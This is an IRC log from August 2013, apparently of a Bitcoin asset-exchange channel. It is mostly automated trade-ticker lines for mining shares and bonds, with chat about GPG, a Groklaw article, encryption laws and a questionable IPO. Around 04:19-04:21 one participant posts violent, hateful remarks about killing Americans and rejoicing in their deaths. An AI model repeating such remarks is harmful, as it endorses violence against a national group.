01:27:22 [BTCTC] [ACTIVEMINING] 827 @ 0.00518 = 4.2839 BTC [-] Aug 21 01:27:23 [HAVELOCK] [SMG] 213 @ 0.00019 = 0.0405 BTC [-] Aug 21 01:27:26 [HAVELOCK] [SMG] 753 @ 0.0001789 = 0.1347 BTC [-] Aug 21 01:27:29 [HAVELOCK] [SMG] 34 @ 0.0001788 = 0.0061 BTC [-] Aug 21 01:28:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.03591 = 0.2873 BTC [+] Aug 21 01:29:56 [MPEX] [S.MPOE] 2550 @ 0.00082874 = 2.1133 BTC [-] Aug 21 01:30:31 [BTCTC] [ACTIVEMINING] 16 @ 0.005265 = 0.0842 BTC [+] Aug 21 01:35:15 [BTCTC] [TAT.MINIGAME] 90 @ 0.0002422 = 0.0218 BTC [+] Aug 21 01:35:16 [BTCTC] [TAT.MINIGAME] 20 @ 0.0002412 = 0.0048 BTC [-] Aug 21 01:35:17 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002412 = 0.0121 BTC [-] Aug 21 01:35:18 [BTCTC] [TAT.MINIGAME] 840 @ 0.0002401 = 0.2017 BTC [-] Aug 21 01:35:49 [BTCTC] [HOSTED-MINING] 10 @ 0.28 = 2.8 BTC [+] Aug 21 01:35:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0344 BTC [-] Aug 21 01:37:43 [BTCTC] [ASICMINER-PT] 1 @ 3.504 BTC [-] Aug 21 01:37:59 [BTCTC] [ASICMINER-PT] 1 @ 3.503 BTC [-] Aug 21 01:38:24 [BTCTC] [ASICMINER-PT] 1 @ 3.503 BTC [-] Aug 21 01:39:03 [BTCTC] [LABCOIN] 2894 @ 0.002454 = 7.1019 BTC [+] Aug 21 01:39:04 [BTCTC] [LABCOIN] 225 @ 0.002463 = 0.5542 BTC [+] Aug 21 01:39:06 [BTCTC] [LABCOIN] 1431 @ 0.002464 = 3.526 BTC [+] Aug 21 01:39:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.03435 BTC [-] Aug 21 01:44:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005201 = 0.156 BTC [-] Aug 21 01:44:23 [BTCTC] [ACTIVEMINING] 388 @ 0.0052 = 2.0176 BTC [-] Aug 21 01:45:41 [BTCTC] [NASTY-PT] 47 @ 0.003235 = 0.152 BTC [-] Aug 21 01:49:40 [BTCTC] [ACTIVEMINING] 30 @ 0.005267 = 0.158 BTC [+] Aug 21 01:49:42 [BTCTC] [ACTIVEMINING] 68 @ 0.005268 = 0.3582 BTC [+] Aug 21 01:49:43 [BTCTC] [ACTIVEMINING] 402 @ 0.005274 = 2.1201 BTC [+] Aug 21 01:51:46 [BTCTC] [PAJKA.BOND] 1 @ 0.0174 BTC [-] Aug 21 01:51:47 [BTCTC] [PAJKA.BOND] 8 @ 0.0174 = 0.1392 BTC [-] Aug 21 01:52:47 [MPEX] [S.MPOE] 5600 @ 0.0008201 = 4.5926 BTC [-] Aug 21 01:56:05 [BTCTC] [LABCOIN] 121 @ 0.002464 = 0.2981 BTC [+] Aug 21 01:58:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005189 = 0.1557 BTC [-] Aug 21 01:58:21 [BTCTC] [ACTIVEMINING] 68 @ 0.005188 = 0.3528 BTC [-] Aug 21 01:58:23 [BTCTC] [ACTIVEMINING] 20 @ 0.005179 = 0.1036 BTC [-] Aug 21 01:58:23 [BTCTC] [ACTIVEMINING] 20 @ 0.005177 = 0.1035 BTC [-] Aug 21 01:58:24 [BTCTC] [ACTIVEMINING] 120 @ 0.005171 = 0.6205 BTC [-] Aug 21 01:58:25 [BTCTC] [ACTIVEMINING] 40 @ 0.00516 = 0.2064 BTC [-] Aug 21 01:58:26 [BTCTC] [ACTIVEMINING] 362 @ 0.005103 = 1.8473 BTC [-] Aug 21 01:58:28 [BTCTC] [ACTIVEMINING] 6 @ 0.005102 = 0.0306 BTC [-] Aug 21 01:58:29 [BTCTC] [ACTIVEMINING] 130 @ 0.005101 = 0.6631 BTC [-] Aug 21 01:58:30 [BTCTC] [ACTIVEMINING] 1145 @ 0.0051 = 5.8395 BTC [-] Aug 21 01:59:39 [BTCTC] [LABCOIN] 3 @ 0.002464 = 0.0074 BTC [+] Aug 21 01:59:52 [BTCTC] [LABCOIN] 10 @ 0.002464 = 0.0246 BTC [+] Aug 21 02:00:29 [BTCTC] [BASIC-MINING] 1 @ 0.291 BTC [-] Aug 21 02:00:30 [BTCTC] [BASIC-MINING] 1 @ 0.291 BTC [-] Aug 21 02:00:31 [BTCTC] [BASIC-MINING] 7 @ 0.2909 = 2.0363 BTC [-] Aug 21 02:00:32 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [-] Aug 21 02:02:18 [BTCTC] [BTC-GROWTH] 10 @ 0.1002 = 1.002 BTC [+] Aug 21 02:06:18 [BTCTC] [DMS.PURCHASE] 8 @ 0.02061 = 0.1649 BTC [+] Aug 21 02:07:00 [BTCTC] [DMS.SELLING] 5 @ 0.0179 = 0.0895 BTC [-] Aug 21 02:07:13 [MPEX] [S.MPOE] 4000 @ 0.00081801 = 3.272 BTC [-] Aug 21 02:07:58 [BTCTC] [LABCOIN] 25 @ 0.002459 = 0.0615 BTC [-] Aug 21 02:09:19 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 21 02:09:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005261 = 0.0526 BTC [+] Aug 21 02:10:45 [BTCTC] [DMS.SELLING] 6 @ 0.0175 = 0.105 BTC [-] Aug 21 02:11:07 [BTCTC] [DMS.MINING] 6 @ 0.003201 = 0.0192 BTC [-] Aug 21 02:15:50 [BTCTC] [ACTIVEMINING] 30 @ 0.00519 = 0.1557 BTC [-] Aug 21 02:18:07 [BTCTC] [LABCOIN] 94 @ 0.002459 = 0.2311 BTC [-] Aug 21 02:18:07 [BTCTC] [LABCOIN] 435 @ 0.002464 = 1.0718 BTC [+] Aug 21 02:18:09 [BTCTC] [LABCOIN] 100 @ 0.002469 = 0.2469 BTC [+] Aug 21 02:18:10 [BTCTC] [LABCOIN] 4000 @ 0.002469 = 9.876 BTC [+] Aug 21 02:18:11 [BTCTC] [LABCOIN] 520 @ 0.00247 = 1.2844 BTC [+] Aug 21 02:18:12 [BTCTC] [LABCOIN] 700 @ 0.00247 = 1.729 BTC [+] Aug 21 02:18:13 [BTCTC] [LABCOIN] 2000 @ 0.00247 = 4.94 BTC [+] Aug 21 02:18:14 [BTCTC] [LABCOIN] 200 @ 0.002479 = 0.4958 BTC [+] Aug 21 02:18:15 [BTCTC] [LABCOIN] 500 @ 0.00248 = 1.24 BTC [+] Aug 21 02:18:16 [BTCTC] [LABCOIN] 9 @ 0.00248 = 0.0223 BTC [+] Aug 21 02:18:17 [BTCTC] [LABCOIN] 1442 @ 0.002484 = 3.5819 BTC [+] Aug 21 02:19:06 .d Aug 21 02:19:09 50810339.04828 | Next Diff in 732 blocks | Estimated Change: 23.5726% in 3d 21h 15m 0s Aug 21 02:19:43 [HAVELOCK] [AM100] 1 @ 0.03579999 BTC [+] Aug 21 02:26:50 Whats this pending BTC explosion I'm hearing trolls bickering about Aug 21 02:27:39 [BTCTC] [ACTIVEMINING] 30 @ 0.00511 = 0.1533 BTC [-] Aug 21 02:27:41 f'n trolls..thats all Aug 21 02:27:42 [BTCTC] [ACTIVEMINING] 955 @ 0.005105 = 4.8753 BTC [-] Aug 21 02:27:42 [BTCTC] [ACTIVEMINING] 355 @ 0.0051 = 1.8105 BTC [-] Aug 21 02:27:43 [BTCTC] [ACTIVEMINING] 50 @ 0.0051 = 0.255 BTC [-] Aug 21 02:27:44 [BTCTC] [ACTIVEMINING] 1 @ 0.0051 BTC [-] Aug 21 02:27:45 [BTCTC] [ACTIVEMINING] 125 @ 0.0051 = 0.6375 BTC [-] Aug 21 02:27:46 [BTCTC] [ACTIVEMINING] 534 @ 0.0051 = 2.7234 BTC [-] Aug 21 02:27:47 [BTCTC] [ACTIVEMINING] 55 @ 0.0051 = 0.2805 BTC [-] Aug 21 02:28:00 [BTCTC] [BTC-GROWTH] 10 @ 0.0999 = 0.999 BTC [-] Aug 21 02:28:50 [BTCTC] [DMS.MINING] 38 @ 0.00331 = 0.1258 BTC [+] Aug 21 02:28:50 [BTCTC] [DMS.MINING] 116 @ 0.00332 = 0.3851 BTC [+] Aug 21 02:28:52 [BTCTC] [DMS.MINING] 72 @ 0.00332 = 0.239 BTC [+] Aug 21 02:28:53 [BTCTC] [DMS.MINING] 4 @ 0.00332 = 0.0133 BTC [+] Aug 21 02:28:54 [BTCTC] [DMS.MINING] 92 @ 0.00333 = 0.3064 BTC [+] Aug 21 02:28:55 [BTCTC] [DMS.MINING] 50 @ 0.00334 = 0.167 BTC [+] Aug 21 02:28:56 [BTCTC] [DMS.MINING] 50 @ 0.003345 = 0.1673 BTC [+] Aug 21 02:28:57 [BTCTC] [DMS.MINING] 533 @ 0.003347 = 1.784 BTC [+] Aug 21 02:29:11 [BTCTC] [LABCOIN] 1 @ 0.002453 BTC [-] Aug 21 02:30:11 [BTCTC] [LABCOIN] 30 @ 0.002453 = 0.0736 BTC [-] Aug 21 02:30:13 [BTCTC] [LABCOIN] 20 @ 0.002452 = 0.049 BTC [-] Aug 21 02:30:14 [BTCTC] [LABCOIN] 1 @ 0.00245 BTC [-] Aug 21 02:30:16 [BTCTC] [LABCOIN] 8 @ 0.002382 = 0.0191 BTC [-] Aug 21 02:30:16 [BTCTC] [LABCOIN] 65 @ 0.002381 = 0.1548 BTC [-] Aug 21 02:30:23 [BTCTC] [LABCOIN] 30 @ 0.002381 = 0.0714 BTC [-] Aug 21 02:31:20 [BTCTC] [LABCOIN] 1 @ 0.002381 BTC [-] Aug 21 02:32:04 [BTCTC] [LABCOIN] 30 @ 0.002383 = 0.0715 BTC [+] Aug 21 02:32:05 [BTCTC] [LABCOIN] 85 @ 0.002382 = 0.2025 BTC [-] Aug 21 02:32:07 [BTCTC] [LABCOIN] 13 @ 0.00238 = 0.0309 BTC [-] Aug 21 02:32:08 [BTCTC] [LABCOIN] 5 @ 0.002379 = 0.0119 BTC [-] Aug 21 02:32:09 [BTCTC] [LABCOIN] 105 @ 0.002379 = 0.2498 BTC [-] Aug 21 02:32:10 [BTCTC] [LABCOIN] 108 @ 0.002378 = 0.2568 BTC [-] Aug 21 02:32:31 [BTCTC] [ACTIVEMINING] 15 @ 0.005086 = 0.0763 BTC [-] Aug 21 02:32:31 [BTCTC] [ACTIVEMINING] 6 @ 0.005085 = 0.0305 BTC [-] Aug 21 02:32:33 [BTCTC] [ACTIVEMINING] 199 @ 0.005083 = 1.0115 BTC [-] Aug 21 02:32:35 [BTCTC] [ACTIVEMINING] 21 @ 0.005055 = 0.1062 BTC [-] Aug 21 02:32:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.03499 BTC [+] Aug 21 02:34:09 [BTCTC] [TAT.ASICMINER] 67 @ 0.03446 = 2.3088 BTC [-] Aug 21 02:34:11 [BTCTC] [TAT.ASICMINER] 18 @ 0.03445 = 0.6201 BTC [-] Aug 21 02:35:47 [BTCTC] [BTC-BOND] 25 @ 0.009999 = 0.25 BTC [+] Aug 21 02:36:16 [BTCTC] [ASICMINER-PT] 1 @ 3.502 BTC [-] Aug 21 02:36:25 [BTCTC] [LABCOIN] 15 @ 0.002396 = 0.0359 BTC [+] Aug 21 02:36:27 [BTCTC] [LABCOIN] 35 @ 0.002395 = 0.0838 BTC [-] Aug 21 02:39:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.03522 = 0.1761 BTC [+] Aug 21 02:41:33 [BTCTC] [LABCOIN] 30 @ 0.002447 = 0.0734 BTC [+] Aug 21 02:41:35 [BTCTC] [LABCOIN] 85 @ 0.002448 = 0.2081 BTC [+] Aug 21 02:41:35 [BTCTC] [LABCOIN] 14 @ 0.00245 = 0.0343 BTC [+] Aug 21 02:43:29 [BTCTC] [LABCOIN] 1 @ 0.002481 BTC [+] Aug 21 02:49:09 [HAVELOCK] [XBOND] 53 @ 0.001075 = 0.057 BTC [+] Aug 21 02:51:11 [HAVELOCK] [XBOND] 45 @ 0.001075 = 0.0484 BTC [+] Aug 21 02:51:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.03506 = 0.1052 BTC [-] Aug 21 02:52:43 [BTCTC] [DMS.SELLING] 5 @ 0.01789 = 0.0895 BTC [+] Aug 21 02:53:31 [BTCTC] [DMS.PURCHASE] 5 @ 0.02061 = 0.1031 BTC [+] Aug 21 02:54:00 http://www.groklaw.net/article.php?story=20130818120421175 Aug 21 02:54:04 Groklaw - Forced Exposure ~pj Aug 21 02:55:31 [BTCTC] [DMS.MINING] 5 @ 0.003212 = 0.0161 BTC [-] Aug 21 02:56:56 not sure why they posted that instead of a public key Aug 21 02:57:14 ^ same thoughts Aug 21 02:58:27 they should rename the article from "Forced exposure" to "Seriously, I'm obviously very intelligent, but I can't figure out GPG" Aug 21 03:04:39 Isn't that an oxymoron Aug 21 03:04:46 how can you be intelligent if you can't figure out GPG? Aug 21 03:05:29 well, different people have different aptitudes Aug 21 03:05:37 you ever change an oil filter? Aug 21 03:06:59 [BTCTC] [LABCOIN] 171 @ 0.002452 = 0.4193 BTC [-] Aug 21 03:07:01 [BTCTC] [LABCOIN] 2 @ 0.002397 = 0.0048 BTC [-] Aug 21 03:07:02 [BTCTC] [LABCOIN] 20 @ 0.002396 = 0.0479 BTC [-] Aug 21 03:07:03 [BTCTC] [LABCOIN] 128 @ 0.002381 = 0.3048 BTC [-] Aug 21 03:07:04 [BTCTC] [LABCOIN] 1025 @ 0.00238 = 2.4395 BTC [-] Aug 21 03:07:06 [BTCTC] [LABCOIN] 3 @ 0.002379 = 0.0071 BTC [-] Aug 21 03:07:06 [BTCTC] [LABCOIN] 1307 @ 0.002378 = 3.108 BTC [-] Aug 21 03:07:07 [BTCTC] [LABCOIN] 2000 @ 0.002377 = 4.754 BTC [-] Aug 21 03:07:08 [BTCTC] [LABCOIN] 344 @ 0.002377 = 0.8177 BTC [-] Aug 21 03:07:09 [MPEX] [S.MPOE] 3600 @ 0.00081963 = 2.9507 BTC [+] Aug 21 03:07:10 [MPEX] [S.MPOE] 4609 @ 0.00082017 = 3.7802 BTC [+] Aug 21 03:08:51 I wouldn't know, but I could probably learn easily. Learning GPG is but a google search away. Aug 21 03:09:05 re nummbins Aug 21 03:09:20 nubbins`* Aug 21 03:10:24 yeah, fair enough Aug 21 03:10:29 makes the whole situation more odd Aug 21 03:14:12 [BTCTC] [ACTIVEMINING] 200 @ 0.00515 = 1.03 BTC [+] Aug 21 03:14:20 [BTCTC] [ASICMINER-PT] 2 @ 3.503 = 7.006 BTC [+] Aug 21 03:14:21 [BTCTC] [ASICMINER-PT] 4 @ 3.504 = 14.016 BTC [+] Aug 21 03:15:13 [BTCTC] [ACTIVEMINING] 15 @ 0.005101 = 0.0765 BTC [-] Aug 21 03:15:15 [BTCTC] [ACTIVEMINING] 300 @ 0.0051 = 1.53 BTC [-] Aug 21 03:15:59 [BTCTC] [ACTIVEMINING] 4 @ 0.005196 = 0.0208 BTC [+] Aug 21 03:21:31 [BTCTC] [BTC-GROWTH] 1 @ 0.1001 BTC [+] Aug 21 03:22:04 [BTCTC] [BTC-GROWTH] 4 @ 0.1002 = 0.4008 BTC [+] Aug 21 03:22:17 [BTCTC] [ACTIVEMINING] 6 @ 0.005063 = 0.0304 BTC [-] Aug 21 03:22:19 [BTCTC] [ACTIVEMINING] 12 @ 0.005062 = 0.0607 BTC [-] Aug 21 03:22:20 [BTCTC] [ACTIVEMINING] 980 @ 0.00506 = 4.9588 BTC [-] Aug 21 03:24:31 [BTCTC] [ACTIVEMINING] 24 @ 0.005055 = 0.1213 BTC [-] Aug 21 03:24:32 [BTCTC] [ACTIVEMINING] 106 @ 0.005054 = 0.5357 BTC [-] Aug 21 03:24:34 [BTCTC] [ACTIVEMINING] 3 @ 0.005054 = 0.0152 BTC [-] Aug 21 03:24:35 [BTCTC] [ACTIVEMINING] 1649 @ 0.005052 = 8.3307 BTC [-] Aug 21 03:25:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005159 = 0.1548 BTC [+] Aug 21 03:25:34 [BTCTC] [ACTIVEMINING] 27 @ 0.00516 = 0.1393 BTC [+] Aug 21 03:26:15 [HAVELOCK] [AM100] 1 @ 0.03504066 BTC [-] Aug 21 03:26:16 [HAVELOCK] [AM100] 11 @ 0.03500002 = 0.385 BTC [-] Aug 21 03:26:19 [HAVELOCK] [AM100] 9 @ 0.035 = 0.315 BTC [-] Aug 21 03:26:21 [HAVELOCK] [AM100] 3 @ 0.035 = 0.105 BTC [-] Aug 21 03:30:01 http://www.youtube.com/watch?v=4UWYgus0MWE Aug 21 03:30:12 that's how u play tetris Aug 21 03:32:27 i'd be surprised if a law making encryption illegal isn't just around the corner Aug 21 03:33:14 I doubt it. Too many businesses rely on it Aug 21 03:33:21 maybe illegal for peasants Aug 21 03:38:40 isn't it already illegal in the usa to export encryption software to certain countries? Aug 21 03:40:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005122 = 0.1537 BTC [-] Aug 21 03:40:24 [BTCTC] [LABCOIN] 30 @ 0.002389 = 0.0717 BTC [+] Aug 21 03:40:25 [BTCTC] [LABCOIN] 20 @ 0.002388 = 0.0478 BTC [-] Aug 21 03:40:27 [BTCTC] [LABCOIN] 5000 @ 0.002386 = 11.93 BTC [-] Aug 21 03:40:28 [BTCTC] [LABCOIN] 2000 @ 0.002377 = 4.754 BTC [-] Aug 21 03:40:29 [BTCTC] [LABCOIN] 5000 @ 0.002376 = 11.88 BTC [-] Aug 21 03:40:33 [BTCTC] [ACTIVEMINING] 2 @ 0.005122 = 0.0102 BTC [-] Aug 21 03:41:07 [BTCTC] [BTC-GROWTH] 5 @ 0.1002 = 0.501 BTC [+] Aug 21 03:41:24 it was, it was defeated by printing pgp on a book Aug 21 03:42:17 in France we had a silly law that limited key sizes too. thus we had no ecommerce or banking websites for a while Aug 21 03:46:01 [BTCTC] [ACTIVEMINING] 6 @ 0.005118 = 0.0307 BTC [-] Aug 21 03:49:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005054 = 0.1516 BTC [-] Aug 21 03:49:30 [BTCTC] [ACTIVEMINING] 10 @ 0.005053 = 0.0505 BTC [-] Aug 21 03:49:32 [BTCTC] [ACTIVEMINING] 351 @ 0.005052 = 1.7733 BTC [-] Aug 21 03:49:32 [BTCTC] [ACTIVEMINING] 18 @ 0.005052 = 0.0909 BTC [-] Aug 21 03:49:34 [BTCTC] [ACTIVEMINING] 1961 @ 0.005051 = 9.905 BTC [-] Aug 21 03:50:51 "The next logical question is: Do the owners (non BTC shareholders) derive their profit from more revenue streams than the 20% BTC shareholders?" Aug 21 03:50:59 Duffer1: good one! Aug 21 03:51:28 man getting straight answers from those guys is a huge red flag Aug 21 03:51:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.03483 = 0.1742 BTC [-] Aug 21 03:52:21 [BTCTC] [TAT.ASICMINER] 11 @ 0.03481 = 0.3829 BTC [-] Aug 21 03:52:42 their business looks legit, it's just their ipo that smell like ... Aug 21 03:53:18 http://www.groklaw.net/article.php?story=20130818120421175 Aug 21 03:53:23 Groklaw - Forced Exposure ~pj Aug 21 03:53:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001491 BTC [+] Aug 21 03:55:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.0349 = 0.3839 BTC [+] Aug 21 03:55:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.0349 = 0.4886 BTC [+] Aug 21 03:56:41 [HAVELOCK] [AM100] 12 @ 0.034935 = 0.4192 BTC [-] Aug 21 03:57:04 yeah, the ipo thread is bizarre Aug 21 04:04:41 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 21 04:04:56 [HAVELOCK] [XBOND] 20 @ 0.001075 = 0.0215 BTC [+] Aug 21 04:05:43 [HAVELOCK] [AM100] 5 @ 0.035499 = 0.1775 BTC [+] Aug 21 04:05:46 [HAVELOCK] [AM100] 5 @ 0.035499 = 0.1775 BTC [+] Aug 21 04:13:46 [BTCTC] [ACTIVEMINING] 68 @ 0.005173 = 0.3518 BTC [+] Aug 21 04:13:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005176 = 0.1553 BTC [+] Aug 21 04:14:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005177 = 0.1553 BTC [+] Aug 21 04:14:27 [BTCTC] [ACTIVEMINING] 12 @ 0.005176 = 0.0621 BTC [-] Aug 21 04:15:46 [BTCTC] [BITVPS] 1 @ 0.002514 BTC [+] Aug 21 04:15:47 [BTCTC] [BITVPS] 27 @ 0.002515 = 0.0679 BTC [+] Aug 21 04:17:19 what is really annoying about all this is, in the case of email interception has been public knowledge for a very long time Aug 21 04:17:46 well, a decade at least. Aug 21 04:17:53 three for a very select group Aug 21 04:18:18 wholesale internet filtering wasnt a secret either but the email thing was pretty widely known Aug 21 04:19:21 [BTCTC] [ACTIVEMINING] 15 @ 0.005069 = 0.076 BTC [-] Aug 21 04:19:22 [BTCTC] [ACTIVEMINING] 67 @ 0.005068 = 0.3396 BTC [-] Aug 21 04:19:28 [HAVELOCK] [XBOND] 35 @ 0.001075 = 0.0376 BTC [+] Aug 21 04:19:42 and this internet lawyer crying about 9/11, shouldn't we all be rejoicing dead americans in light of this new found publicity? Aug 21 04:19:50 I mean, thats the fix, kill america Aug 21 04:21:31 you can't claim a lack of understanding now fatties, this is why everyone wants you dead Aug 21 04:21:46 heh. Aug 21 04:22:18 [MPEX] [S.BBET] 14000 @ 0.00065998 = 9.2397 BTC [-] Aug 21 04:25:14 [BTCTC] [S.BBET-PT] 2 @ 0.001801 = 0.0036 BTC [+] Aug 21 04:25:16 [BTCTC] [S.BBET-PT] 1 @ 0.0018 BTC [-] Aug 21 04:25:17 [BTCTC] [S.BBET-PT] 6 @ 0.0018 = 0.0108 BTC [-] Aug 21 04:25:18 [BTCTC] [S.BBET-PT] 2 @ 0.001701 = 0.0034 BTC [-] Aug 21 04:25:20 [BTCTC] [S.BBET-PT] 10 @ 0.0017 = 0.017 BTC [-] Aug 21 04:25:20 [BTCTC] [S.BBET-PT] 1 @ 0.001599 BTC [-] Aug 21 04:25:21 [BTCTC] [S.BBET-PT] 25 @ 0.001501 = 0.0375 BTC [-] Aug 21 04:25:22 [BTCTC] [S.BBET-PT] 6000 @ 0.001501 = 9.006 BTC [-] Aug 21 04:25:24 [BTCTC] [S.BBET-PT] 3000 @ 0.0015 = 4.5 BTC [-] Aug 21 04:25:25 [BTCTC] [S.BBET-PT] 50 @ 0.001306 = 0.0653 BTC [-] Aug 21 04:25:26 [BTCTC] [S.BBET-PT] 166 @ 0.001305 = 0.2166 BTC [-] Aug 21 04:25:27 [BTCTC] [S.BBET-PT] 4737 @ 0.0013 = 6.1581 BTC [-] Aug 21 04:26:13 [HAVELOCK] [XBOND] 2 @ 0.00119 = 0.0024 BTC [+] Aug 21 04:26:38 [BTCTC] [DMS.SELLING] 2 @ 0.01749 = 0.035 BTC [-] Aug 21 04:27:01 [BTCTC] [DMS.MINING] 1 @ 0.003213 BTC [+] Aug 21 04:27:01 [BTCTC] [DMS.MINING] 1 @ 0.003212 BTC [-] Aug 21 04:27:16 [BTCTC] [LABCOIN] 20 @ 0.002341 = 0.0468 BTC [-] Aug 21 04:27:18 [BTCTC] [LABCOIN] 200 @ 0.00234 = 0.468 BTC [-] Aug 21 04:28:54 http://www.buzzfeed.com/pipcowley/21-painfully-awkward-band-photos-cuob Aug 21 04:28:57 21 Painfully Awkward Band Photos Aug 21 04:30:22 did someone just arb bitbet from 6.5 to ~15 ? Aug 21 04:31:04 [HAVELOCK] [XBOND] 5 @ 0.00119 = 0.006 BTC [+] Aug 21 04:32:38 [BTCTC] [LABCOIN] 20 @ 0.002341 = 0.0468 BTC [+] Aug 21 04:32:44 Yes Aug 21 04:33:05 [BTCTC] [LABCOIN] 1 @ 0.002365 BTC [+] Aug 21 04:33:07 [BTCTC] [LABCOIN] 20 @ 0.002366 = 0.0473 BTC [+] Aug 21 04:33:45 Now just 1169 more S.BBET purchased on MPEx and price are the same. Aug 21 04:34:37 [MPEX] [S.BBET] 169 @ 0.00065998 = 0.1115 BTC [-] Aug 21 04:34:39 [MPEX] [S.BBET] 570 @ 0.00109999 = 0.627 BTC [+] Aug 21 04:35:02 [MPEX] [S.BBET] 185 @ 0.00109999 = 0.2035 BTC [+] Aug 21 04:36:00 [BTCTC] [S.BBET-PT] 263 @ 0.0013 = 0.3419 BTC [-] Aug 21 04:37:31 That's about equilibrated Aug 21 04:38:01 There's not many shares under 0.002 Aug 21 04:38:23 But there was a 20k sell order at 0.0006 that appeared Aug 21 04:39:13 equilibrated eh Aug 21 04:39:22 [BTCTC] [LABCOIN] 30 @ 0.002434 = 0.073 BTC [+] Aug 21 04:39:23 [BTCTC] [LABCOIN] 35 @ 0.002435 = 0.0852 BTC [+] Aug 21 04:39:23 [BTCTC] [LABCOIN] 8 @ 0.002437 = 0.0195 BTC [+] Aug 21 04:39:25 [BTCTC] [LABCOIN] 2 @ 0.00244 = 0.0049 BTC [+] Aug 21 04:39:26 [BTCTC] [LABCOIN] 20 @ 0.002441 = 0.0488 BTC [+] Aug 21 04:39:27 [BTCTC] [LABCOIN] 3 @ 0.002458 = 0.0074 BTC [+] Aug 21 04:39:28 [BTCTC] [LABCOIN] 8 @ 0.002471 = 0.0198 BTC [+] Aug 21 04:39:29 [BTCTC] [LABCOIN] 65 @ 0.002472 = 0.1607 BTC [+] Aug 21 04:39:30 [BTCTC] [LABCOIN] 138 @ 0.002473 = 0.3413 BTC [+] Aug 21 04:39:31 [BTCTC] [LABCOIN] 1105 @ 0.002474 = 2.7338 BTC [+] Aug 21 04:39:32 [BTCTC] [LABCOIN] 625 @ 0.002475 = 1.5469 BTC [+] Aug 21 04:39:33 [BTCTC] [LABCOIN] 5000 @ 0.002476 = 12.38 BTC [+] Aug 21 04:39:34 [BTCTC] [LABCOIN] 500 @ 0.002478 = 1.239 BTC [+] Aug 21 04:39:49 I haven't gotten funds to MPEx in a while Aug 21 04:40:08 Actually didn't since S.DICE got bought back. Aug 21 04:46:51 I used to buy new shares with divs to sell on the PTs and pay divs with sales instead of having to move the funds to MPEx Aug 21 04:47:02 But now I don't get much divs at all **** BEGIN LOGGING AT Wed Aug 21 11:50:31 2013 Aug 21 11:53:38 [HAVELOCK] [XBOND] 5 @ 0.001185 = 0.0059 BTC [-] Aug 21 11:55:42 [BTCTC] [DMS.MINING] 500 @ 0.00328 = 1.64 BTC [+] Aug 21 11:56:03 [BTCTC] [DMS.MINING] 500 @ 0.0033 = 1.65 BTC [+] Aug 21 11:56:08 http://www.usatoday.com/story/tech/2013/08/19/facebook-ceo-zuckerbergs-profile-hacked/2671189/ Aug 21 11:56:09 Facebook CEO Zuckerberg's profile hacked Aug 21 11:56:19 security. not for the poor, not for the pseudo-rich Aug 21 11:56:28 [BTCTC] [DMS.MINING] 118 @ 0.00331 = 0.3906 BTC [+] Aug 21 11:56:56 [BTCTC] [DMS.MINING] 450 @ 0.003318 = 1.4931 BTC [+] Aug 21 11:57:19 [BTCTC] [DMS.MINING] 106 @ 0.003317 = 0.3516 BTC [-] Aug 21 11:57:44 [BTCTC] [DMS.MINING] 44 @ 0.003317 = 0.1459 BTC [-] Aug 21 11:58:06 [BTCTC] [DMS.MINING] 6 @ 0.003319 = 0.0199 BTC [+] Aug 21 11:58:07 [BTCTC] [DMS.MINING] 100 @ 0.003319 = 0.3319 BTC [+] Aug 21 11:58:56 [BTCTC] [DMS.MINING] 500 @ 0.00332 = 1.66 BTC [+] Aug 21 11:58:57 [BTCTC] [DMS.MINING] 400 @ 0.00332 = 1.328 BTC [+] Aug 21 11:59:39 [BTCTC] [DMS.MINING] 16 @ 0.00332 = 0.0531 BTC [+] Aug 21 12:10:40 [BTCTC] [DMS.MINING] 17 @ 0.00332 = 0.0564 BTC [+] Aug 21 12:11:49 [BTCTC] [DMS.MINING] 10 @ 0.00332 = 0.0332 BTC [+] Aug 21 12:15:04 [BTCTC] [TAT.MINIGAME] 10 @ 0.000235 = 0.0024 BTC [-] Aug 21 12:17:23 [BTCTC] [ASICMINER-PT] 1 @ 3.602 BTC [-] Aug 21 12:17:25 [BTCTC] [ASICMINER-PT] 1 @ 3.55 BTC [-] Aug 21 12:17:26 [BTCTC] [ASICMINER-PT] 8 @ 3.541 = 28.328 BTC [-] Aug 21 12:17:27 [BTCTC] [ASICMINER-PT] 2 @ 3.54 = 7.08 BTC [-] Aug 21 12:17:28 [BTCTC] [ASICMINER-PT] 15 @ 3.54 = 53.1 BTC [-] Aug 21 12:17:30 [BTCTC] [ASICMINER-PT] 1 @ 3.531 BTC [-] Aug 21 12:17:31 [BTCTC] [ASICMINER-PT] 1 @ 3.53 BTC [-] Aug 21 12:17:32 [BTCTC] [ASICMINER-PT] 1 @ 3.53 BTC [-] Aug 21 12:17:33 [BTCTC] [ASICMINER-PT] 3 @ 3.521 = 10.563 BTC [-] Aug 21 12:17:34 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 21 12:17:34 [BTCTC] [ASICMINER-PT] 5 @ 3.52 = 17.6 BTC [-] Aug 21 12:17:35 [BTCTC] [ASICMINER-PT] 2 @ 3.516 = 7.032 BTC [-] Aug 21 12:17:36 [BTCTC] [ASICMINER-PT] 6 @ 3.515 = 21.09 BTC [-] Aug 21 12:17:37 [BTCTC] [ASICMINER-PT] 2 @ 3.51 = 7.02 BTC [-] Aug 21 12:17:39 [HAVELOCK] [HIM] 2 @ 0.185 = 0.37 BTC [-] Aug 21 12:18:05 [HAVELOCK] 